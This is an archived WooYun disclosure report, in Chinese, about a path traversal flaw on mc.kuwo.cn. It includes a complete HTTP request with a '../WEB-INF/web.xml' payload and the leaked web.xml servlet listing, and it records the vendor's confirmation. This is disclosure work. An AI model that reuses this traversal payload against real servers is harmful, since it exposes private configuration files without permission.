乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-03: 细节已通知厂商并且等待厂商处理中 2015-03-04: 厂商已经确认,细节仅向厂商公开 2015-03-14: 细节向核心白帽子及相关领域专家公开 2015-03-24: 细节向普通白帽子公开 2015-04-03: 细节向实习白帽子公开 2015-04-17: 细节向公众公开
网站:mc.kuwo.cn任意文件读取遍历,我们来读取web.xml
POST /g/st/WulinLogin HTTP/1.1Referer: http://mc.kuwo.cn/g/jsp/mingchao/zc.jspAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5X-Forwarded-For: 127.0.0.1Content-Type: application/x-www-form-urlencodedHost: mc.kuwo.cnContent-Length: 65Accept-Encoding: gzip, deflatefromwhere=..%2fWEB-INF%2fweb.xml%3bx%3d&username=&password=&code=
HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Feb 2015 11:34:40 GMTContent-Type: application/xml;charset=utf-8Content-Length: 173237Connection: keep-aliveLast-Modified: Thu, 05 Feb 2015 03:46:27 GMTX-Cache: MISS from 74localhost.localdomainVary: Accept-Encoding<?xml version="1.0" encoding="UTF-8"?><web-app version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"> <!-- <servlet> <servlet-name>jsp</servlet-name> <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class> <init-param> <param-name>fork</param-name> <param-value>false</param-value> </init-param> <init-param> <param-name>xpoweredBy</param-name> <param-value>false</param-value> </init-param> <init-param> <param-name>trimSpaces</param-name> <param-value>true</param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> --> <servlet> <description>JumpDiguoServlet</description> <display-name>JumpDiguoServlet</display-name> <servlet-name>JumpDiguoServlet</servlet-name> <servlet-class>com.koowo.game.w51wan.diguo.JumpDiguoServlet</servlet-class> </servlet> <servlet> <description>JumpLuanwuServlet</description> <display-name>JumpLuanwuServlet</display-name> <servlet-name>JumpLuanwuServlet</servlet-name> <servlet-class>com.koowo.game.w51wan.luanwu.JumpLuanwuServlet</servlet-class> </servlet> <servlet> <description>InitServlet</description> <display-name>InitServlet</display-name> <servlet-name>InitServlet</servlet-name> <servlet-class>com.koowo.game.servlet.InitServlet</servlet-class> </servlet> <servlet> <description>JumpQilongServlet</description> <display-name>JumpQilongServlet</display-name> <servlet-name>JumpQilongServlet</servlet-name> <servlet-class>com.koowo.game.duniu.qilong.JumpQilongServlet</servlet-class> </servlet> <servlet> <description>UserLogin51wanServelt</description> <display-name>UserLogin51wanServelt</display-name> <servlet-name>UserLogin51wanServelt</servlet-name> <servlet-class>com.koowo.game.w51wan.UserLogin51wanServelt</servlet-class> </servlet> <servlet> <description>IndexServlet</description> <display-name>IndexServlet</display-name> <servlet-name>IndexServlet</servlet-name> <servlet-class>com.koowo.game.servlet.IndexServlet</servlet-class> </servlet> <servlet> <description>AllAn</description> <display-name>AllAn</display-name> <servlet-name>AllAn</servlet-name> <servlet-class>com.koowo.game.servlet.AllAnServlet</servlet-class> </servlet> <servlet> <description>GameAn</description> <display-name>GameAn</display-name> <servlet-name>GameAn</servlet-name> <servlet-class>com.koowo.game.servlet.GameAnServlet</servlet-class> </servlet> <servlet> <description>An</description> <display-name>An</display-name> <servlet-name>AnServlet</servlet-name> <servlet-class>com.koowo.game.servlet.AnServlet</servlet-class> </servlet> <servlet> <description>AllGame</description> <display-name>AllGame</display-name> <servlet-name>AllGameServlet</servlet-name> <servlet-class>com.koowo.game.servlet.AllGameServlet</servlet-class> </servlet> <servlet> <description>Game</description> <display-name>Game</display-name> <servlet-name>GameServlet</servlet-name> <servlet-class>com.koowo.game.servlet.GameServlet</servlet-class> </servlet> <servlet> <description>JumpSanguoServlet</description> <display-name>JumpSanguoServlet</display-name> <servlet-name>JumpSanguoServlet</servlet-name> <servlet-class>com.koowo.game.kunlun.sanguo.JumpSanguoServlet</servlet-class> </servlet> <servlet> <servlet-name>JumpJianxia</servlet-name> <servlet-class>com.koowo.game.w51wan.jianxia.JumpJianxiaServlet</servlet-class> </servlet> <servlet> <servlet-name>JumpWulinServlet</servlet-name> <servlet-class>com.koowo.game.w9wee.wulin.JumpWulinServlet</servlet-class> </servlet> <servlet> <servlet-name>wulinIndexServlet</servlet-name> <servlet-class>com.koowo.game.servlet.wulin.IndexServlet</servlet-class> </servlet> <servlet> <servlet-name>AllNewsServlet</servlet-name> <servlet-class>com.koowo.game.servlet.AllNewsServlet</servlet-class> </servlet> <servlet> <servlet-name>FresherGuideServlet</servlet-name> <servlet-class>com.koowo.game.servlet.FresherGuideServlet</servlet-class> </servlet> <servlet> <servlet-name>ZiLiaoServlet</servlet-name> <servlet-class>com.koowo.game.servlet.ZiLiaoServlet</servlet-class> </servlet> <servlet> <servlet-name>DirectSignServlet</servlet-name> <servlet-class>com.koowo.game.servlet.DirectSignServlet</servlet-class> </servlet> <servlet> <servlet-name>ShowContentServlet</servlet-name> <servlet-class>com.koowo.game.servlet.ShowContentServlet</servlet-class> </servlet> <servlet> <servlet-name>NewIndexServlet</servlet-name> <servlet-class>com.koowo.game.servlet.NewIndexServlet</servlet-class> </servlet> <servlet> <servlet-name>EntryServlet</servlet-name> <servlet-class>com.koowo.game.servlet.EntryServlet</servlet-class> </servlet> <servlet> <servlet-name>WulinLoginServlet</servlet-name> <servlet-class>com.koowo.game.servlet.wulin.WulinLoginServlet</servlet-class> </servlet> <servlet> <servlet-name>CheckUserNameServlet</servlet-name> <servlet-class>com.koowo.game.servlet.CheckUserNameServlet</servlet-class> </servlet> <servlet> <servlet-name>HuoDongServlet</servlet-name> <servlet-class>com.koowo.game.servlet.HuoDongServlet</servlet-class> </servlet> <servlet> <servlet-name>GongLueServlet</servlet-name> <servlet-class>com.koowo.game.servlet.GongLueServlet</servlet-class> </servlet> <servlet> <servlet-name>rexueIndexServlet</servlet-name>敏感省略。。。
可遍历
危害等级:中
漏洞Rank:8
确认时间:2015-03-04 09:43
多谢对酷我的支持
暂无